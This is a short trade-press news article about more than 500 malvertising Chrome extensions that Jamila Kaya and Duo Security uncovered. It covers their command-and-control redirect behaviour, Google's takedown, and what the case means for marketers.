Harmful malvertising Google Chrome Extensions were active over at least eight months. The extensions redirected millions of users to malicious sites, including to affiliate links or a GDPR announcement site in an apparent attempt to misdirect investigations and appear legitimate.
Malicious ads. Security researcher Jamila Kaya and Cisco’s Duo Security team identified the group of extensions. When a user installs any one of the 500+ extensions, a network of downstream malware sites will act in concert for a command and control scenario to redirect in such a way as to masquerade as ordinary, but intrusive, looking ads.
“The user’s host regularly checks in at an asynchronous interval to the other domains to receive new instructions, locations to upload data, and new domain and feed lists for advertisements and future redirects.”
Jamila Kaya and Jacob Rickerd (Duo.com)
Google response. The researchers alerted Google of the problem, and together, they reached a high confidence level that all rogue extensions were disabled for current installs. Chrome users with any of these extensions will see them marked as malware as a prompt to uninstall, locally.
Presumably, the downstream domains have been added to a shared list of security hazard websites and removed from Google’s search index.
What Kaya discovered was the various extensions all carelessly shared much the same source code, only with function names switched out in order to appear different enough to slip through Google’s automated duplicate detection system, and allowing them to publish the volume of extensions to the Web Store.
Why we care. As marketers, we need to know that security requirements governing the storage of data will continue to increase as Google’s new requirements outline. Additionally, we should be concerned that our reputation suffers when breaches occur and bad advertising gives millions of users bad experiences.